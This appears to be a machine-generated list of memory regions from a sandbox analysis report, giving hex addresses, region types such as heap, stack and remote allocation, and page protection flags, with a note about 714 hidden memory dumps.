||
|
5D00000
|
trusted library allocation
|
page read and write
|
||
|
6580000
|
trusted library allocation
|
page read and write
|
||
|
28B3234D000
|
trusted library allocation
|
page read and write
|
||
|
28B4A590000
|
heap
|
page read and write
|
||
|
5F20000
|
trusted library allocation
|
page read and write
|
||
|
1D52CB5B000
|
heap
|
page read and write
|
||
|
29FF000
|
stack
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
5F20000
|
trusted library allocation
|
page read and write
|
||
|
28B4A8B0000
|
trusted library section
|
page read and write
|
||
|
28B30510000
|
trusted library allocation
|
page read and write
|
||
|
1D52D001000
|
heap
|
page read and write
|
||
|
28B4A8D4000
|
trusted library allocation
|
page read and write
|
||
|
6580000
|
trusted library allocation
|
page read and write
|
||
|
2D01000
|
trusted library allocation
|
page read and write
|
||
|
28B323BE000
|
trusted library allocation
|
page read and write
|
||
|
1D52CD9F000
|
heap
|
page read and write
|
||
|
5F20000
|
trusted library allocation
|
page read and write
|
||
|
2B31000
|
trusted library allocation
|
page read and write
|
||
|
28B4A5A8000
|
heap
|
page read and write
|
||
|
F2E000
|
stack
|
page read and write
|
||
|
28B4AA40000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5C40000
|
trusted library allocation
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5953000
|
trusted library allocation
|
page execute and read and write
|
||
|
5F10000
|
trusted library allocation
|
page read and write
|
||
|
C84CCFF000
|
stack
|
page read and write
|
||
|
28B4A8C1000
|
trusted library allocation
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
5000000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5C00000
|
trusted library allocation
|
page read and write
|
||
|
28B4A5AD000
|
heap
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
5F80000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5C70000
|
trusted library allocation
|
page read and write
|
||
|
28B49EE0000
|
heap
|
page read and write
|
||
|
2B80000
|
heap
|
page read and write
|
||
|
6580000
|
trusted library allocation
|
page read and write
|
||
|
28B4A50E000
|
heap
|
page read and write
|
||
|
402000
|
remote allocation
|
page execute and read and write
|
||
|
5F20000
|
trusted library allocation
|
page read and write
|
||
|
17314FF000
|
stack
|
page read and write
|
||
|
5050000
|
trusted library allocation
|
page read and write
|
||
|
E74000
|
heap
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
5F00000
|
trusted library allocation
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
C84C4B5000
|
stack
|
page read and write
|
||
|
5EF6000
|
trusted library allocation
|
page read and write
|
||
|
5F40000
|
trusted library allocation
|
page read and write
|
||
|
1D52CD7F000
|
heap
|
page read and write
|
||
|
D83000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D52ACB5000
|
heap
|
page read and write
|
||
|
5D00000
|
trusted library allocation
|
page read and write
|
||
|
28B4A4CD000
|
heap
|
page read and write
|
||
|
1D52CD77000
|
heap
|
page read and write
|
||
|
C84CAF8000
|
stack
|
page read and write
|
||
|
1D52CD04000
|
heap
|
page read and write
|
||
|
5D40000
|
trusted library allocation
|
page read and write
|
||
|
28B4A523000
|
heap
|
page read and write
|
||
|
28B4AAA0000
|
trusted library allocation
|
page read and write
|
||
|
1D52C6B0000
|
heap
|
page read and write
|
||
|
6580000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5B60000
|
trusted library allocation
|
page read and write
|
||
|
17315FB000
|
stack
|
page read and write
|
||
|
7FF9A5C20000
|
trusted library allocation
|
page read and write
|
||
|
1D52AC98000
|
heap
|
page read and write
|
||
|
660F000
|
trusted library allocation
|
page read and write
|
||
|
5F80000
|
trusted library allocation
|
page read and write
|
||
|
28B4AAB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5C90000
|
trusted library allocation
|
page read and write
|
||
|
28B4A51C000
|
heap
|
page read and write
|
||
|
28B4A4FD000
|
heap
|
page read and write
|
||
|
C84C5BE000
|
stack
|
page read and write
|
||
|
2B17000
|
trusted library allocation
|
page read and write
|
||
|
28B4A8D6000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5CB0000
|
trusted library allocation
|
page read and write
|
||
|
6770000
|
trusted library allocation
|
page read and write
|
||
|
EB7000
|
trusted library allocation
|
page execute and read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
28B4A52C000
|
heap
|
page read and write
|
||
|
5CE0000
|
trusted library allocation
|
page read and write
|
||
|
65F0000
|
trusted library allocation
|
page read and write
|
||
|
28B32495000
|
trusted library allocation
|
page read and write
|
||
|
28B4A5D1000
|
heap
|
page read and write
|
||
|
C84CC78000
|
stack
|
page read and write
|
||
|
5F80000
|
trusted library allocation
|
page read and write
|
||
|
1D52ACA2000
|
heap
|
page read and write
|
||
|
6600000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5B40000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D52CD2E000
|
heap
|
page read and write
|
||
|
28B30482000
|
heap
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
28B304B7000
|
heap
|
page read and write
|
||
|
28B32532000
|
trusted library allocation
|
page read and write
|
||
|
541E000
|
stack
|
page read and write
|
||
|
7FF9A5A06000
|
trusted library allocation
|
page read and write
|
||
|
28B4A52C000
|
heap
|
page read and write
|
||
|
7FF9A5B0C000
|
trusted library allocation
|
page read and write
|
||
|
2A10000
|
heap
|
page read and write
|
||
|
6770000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5A36000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B2C000
|
trusted library allocation
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
5F00000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5BE7000
|
trusted library allocation
|
page read and write
|
||
|
2B0B000
|
trusted library allocation
|
page read and write
|
||
|
28B30447000
|
heap
|
page read and write
|
||
|
B68000
|
stack
|
page read and write
|
||
|
67A0000
|
trusted library allocation
|
page read and write
|
||
|
5CE6000
|
trusted library allocation
|
page read and write
|
||
|
5F7F000
|
trusted library allocation
|
page read and write
|
||
|
1D52CB48000
|
heap
|
page read and write
|
||
|
E9D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF9A5B20000
|
trusted library allocation
|
page execute and read and write
|
||
|
28B41FAD000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5A00000
|
trusted library allocation
|
page read and write
|
||
|
5050000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5B01000
|
trusted library allocation
|
page read and write
|
||
|
28B4AA40000
|
trusted library allocation
|
page read and write
|
||
|
1D52AC7B000
|
heap
|
page read and write
|
||
|
EB2000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5C80000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5BF0000
|
trusted library allocation
|
page read and write
|
||
|
28B4A597000
|
heap
|
page read and write
|
||
|
1D52CD03000
|
heap
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
5F10000
|
trusted library allocation
|
page read and write
|
||
|
28B30540000
|
heap
|
page readonly
|
||
|
28B4AA30000
|
heap
|
page read and write
|
||
|
5F40000
|
trusted library allocation
|
page read and write
|
||
|
1D52CD26000
|
heap
|
page read and write
|
||
|
1D52CAD6000
|
heap
|
page read and write
|
||
|
28B4A540000
|
trusted library allocation
|
page read and write
|
||
|
5F40000
|
trusted library allocation
|
page read and write
|
||
|
5D01000
|
trusted library allocation
|
page read and write
|
||
|
D8D000
|
trusted library allocation
|
page execute and read and write
|
||
|
28B4A441000
|
heap
|
page read and write
|
||
|
5EFA000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5AF2000
|
trusted library allocation
|
page read and write
|
||
|
1D52AC40000
|
heap
|
page read and write
|
||
|
28B4A8F0000
|
trusted library allocation
|
page read and write
|
||
|
5F90000
|
trusted library allocation
|
page read and write
|
||
|
2AFD000
|
stack
|
page read and write
|
||
|
5F85000
|
trusted library allocation
|
page read and write
|
||
|
6580000
|
trusted library allocation
|
page read and write
|
||
|
6580000
|
trusted library allocation
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
5F20000
|
trusted library allocation
|
page read and write
|
||
|
28B4A522000
|
heap
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
65D0000
|
trusted library allocation
|
page read and write
|
||
|
2B25000
|
trusted library allocation
|
page read and write
|
||
|
1D52CB2F000
|
heap
|
page read and write
|
||
|
5F20000
|
trusted library allocation
|
page read and write
|
||
|
E65000
|
heap
|
page read and write
|
||
|
28B4A8C0000
|
trusted library allocation
|
page read and write
|
||
|
65D0000
|
trusted library allocation
|
page read and write
|
||
|
5D00000
|
trusted library allocation
|
page read and write
|
||
|
1D52CB37000
|
heap
|
page read and write
|
||
|
EBB000
|
trusted library allocation
|
page execute and read and write
|
||
|
65B0000
|
trusted library allocation
|
page read and write
|
||
|
6580000
|
trusted library allocation
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
5FE8000
|
heap
|
page read and write
|
||
|
5D00000
|
trusted library allocation
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
5050000
|
trusted library allocation
|
page read and write
|
||
|
28B304CA000
|
heap
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
2B40000
|
trusted library allocation
|
page read and write
|
||
|
5D30000
|
trusted library allocation
|
page read and write
|
||
|
28B32404000
|
trusted library allocation
|
page read and write
|
||
|
E7C000
|
heap
|
page read and write
|
||
|
28B30404000
|
heap
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
28B4AA40000
|
trusted library allocation
|
page read and write
|
||
|
1D52CD77000
|
heap
|
page read and write
|
||
|
5F70000
|
trusted library allocation
|
page read and write
|
||
|
5F20000
|
trusted library allocation
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
28B32329000
|
trusted library allocation
|
page read and write
|
||
|
67D7000
|
trusted library allocation
|
page read and write
|
||
|
5FB2000
|
heap
|
page read and write
|
||
|
28B304CC000
|
heap
|
page read and write
|
||
|
54A0000
|
trusted library allocation
|
page read and write
|
||
|
2A00000
|
trusted library allocation
|
page read and write
|
||
|
1D52CD77000
|
heap
|
page read and write
|
||
|
6560000
|
trusted library allocation
|
page read and write
|
||
|
5F70000
|
trusted library allocation
|
page read and write
|
||
|
5F80000
|
trusted library allocation
|
page read and write
|
||
|
28B31EDD000
|
heap
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
28B4A534000
|
trusted library allocation
|
page read and write
|
||
|
28B4AADB000
|
trusted library allocation
|
page read and write
|
||
|
1D52CD16000
|
heap
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
28B4A8D0000
|
trusted library allocation
|
page read and write
|
||
|
6780000
|
trusted library allocation
|
page read and write
|
||
|
28B4AA40000
|
remote allocation
|
page read and write
|
||
|
28B30530000
|
trusted library allocation
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
5F40000
|
trusted library allocation
|
page read and write
|
||
|
7FF9A5B04000
|
trusted library allocation
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
1730CFE000
|
stack
|
page read and write
|
||
|
67D0000
|
trusted library allocation
|
page read and write
|
||
|
F50000
|
heap
|
page read and write
|
||
|
5F10000
|
trusted library allocation
|
page read and write
|
||
|
28B4A4D5000
|
heap
|
page read and write
|
||
|
1D52CB5B000
|
heap
|
page read and write
|
||
|
5F70000
|
trusted library allocation
|
page execute and read and write
|
||
|
51F0000
|
heap
|
page read and write
|
||
|
28B304DD000
|
heap
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
1730EFE000
|
stack
|
page read and write
|
||
|
28B4A8C0000
|
trusted library allocation
|
page read and write
|
||
|
F30000
|
trusted library allocation
|
page read and write
|
||
|
28B323B0000
|
trusted library allocation
|
page read and write
|
||
|
28B4A8F0000
|
trusted library allocation
|
page read and write
|
||
|
1D52CB3E000
|
heap
|
page read and write
|
||
|
1D52CAEF000
|
heap
|
page read and write
|
||
|
5F70000
|
trusted library allocation
|
page read and write
|
||
|
1D52CD34000
|
heap
|
page read and write
|
||
|
C84CDFF000
|
stack
|
page read and write
|
||
|
28B4AAE0000
|
trusted library allocation
|
page read and write
|
||
|
65A0000
|
trusted library allocation
|
page read and write
|
||
|
2B1D000
|
trusted library allocation
|
page read and write
|
||
|
1D52CB5B000
|
heap
|
page read and write
|
||
|
5F90000
|
trusted library allocation
|
page read and write
|
||
|
658A000
|
trusted library allocation
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
28B4AA40000
|
trusted library allocation
|
page read and write
|
||
|
1730AF9000
|
stack
|
page read and write
|
||
|
28B4AA40000
|
trusted library allocation
|
page read and write
|
||
|
28B4A52C000
|
heap
|
page read and write
|
||
|
6570000
|
trusted library allocation
|
page read and write
|
||
|
28B4A5C6000
|
heap
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
28B41EF0000
|
trusted library allocation
|
page read and write
|
||
|
28B30240000
|
heap
|
page read and write
|
||
|
28B4A5CB000
|
heap
|
page read and write
|
||
|
C84CD7E000
|
stack
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
5F6D000
|
stack
|
page read and write
|
||
|
6580000
|
trusted library allocation
|
page read and write
|
||
|
1D52CD5A000
|
heap
|
page read and write
|
||
|
28B4A8C5000
|
trusted library allocation
|
page read and write
|
||
|
28B4A52C000
|
heap
|
page read and write
|
||
|
28B4A5A3000
|
heap
|
page read and write
|
||
|
2B44000
|
trusted library allocation
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
17313FE000
|
stack
|
page read and write
|
||
|
1D52AC7A000
|
heap
|
page read and write
|
||
|
28B4A527000
|
heap
|
page read and write
|
||
|
28B4A8D0000
|
trusted library allocation
|
page read and write
|
||
|
28B4AA40000
|
trusted library allocation
|
page read and write
|
||
|
5FDE000
|
heap
|
page read and write
|
||
|
5F24000
|
trusted library allocation
|
page read and write
|
||
|
28B324AC000
|
trusted library allocation
|
page read and write
|
There are 714 hidden memdumps, click here to show them.